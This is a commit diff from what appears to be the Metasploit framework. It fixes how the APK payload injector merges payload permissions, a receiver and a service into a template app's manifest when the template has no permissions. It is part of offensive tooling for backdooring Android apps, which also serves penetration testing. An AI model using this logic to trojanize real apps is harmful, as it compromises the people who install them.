Land rapid7#7567, fix apk injection when template has no permissions

timwr · timwr · commit 66ba2b077bdf · 2016-11-17T11:42:54.000Z
diff --git a/lib/msf/core/payload/apk.rb b/lib/msf/core/payload/apk.rb
@@ -75,25 +75,31 @@ def fix_manifest(tempdir)
     original_manifest = parse_manifest("#{tempdir}/original/AndroidManifest.xml")
     original_permissions = original_manifest.xpath("//manifest/uses-permission")
 
-    manifest = original_manifest.xpath('/manifest')
     old_permissions = []
-    for permission in original_permissions
+    original_permissions.each do |permission|
       name = permission.attribute("name").to_s
       old_permissions << name
     end
-    for permission in payload_permissions
+
+    application = original_manifest.xpath('//manifest/application')
+    payload_permissions.each do |permission|
       name = permission.attribute("name").to_s
       unless old_permissions.include?(name)
         print_status("Adding #{name}")
-        original_permissions.before(permission.to_xml)
+        if original_permissions.empty?
+          application.before(permission.to_xml)
+          original_permissions = original_manifest.xpath("//manifest/uses-permission")
+        else
+          original_permissions.before(permission.to_xml)
+        end
       end
     end
 
     application = original_manifest.at_xpath('/manifest/application')
     application << payload_manifest.at_xpath('/manifest/application/receiver').to_xml
     application << payload_manifest.at_xpath('/manifest/application/service').to_xml
 
-    File.open("#{tempdir}/original/AndroidManifest.xml", "wb") {|file| file.puts original_manifest.to_xml }
+    File.open("#{tempdir}/original/AndroidManifest.xml", "wb") { |file| file.puts original_manifest.to_xml }
   end
 
   def parse_orig_cert_data(orig_apkfile)
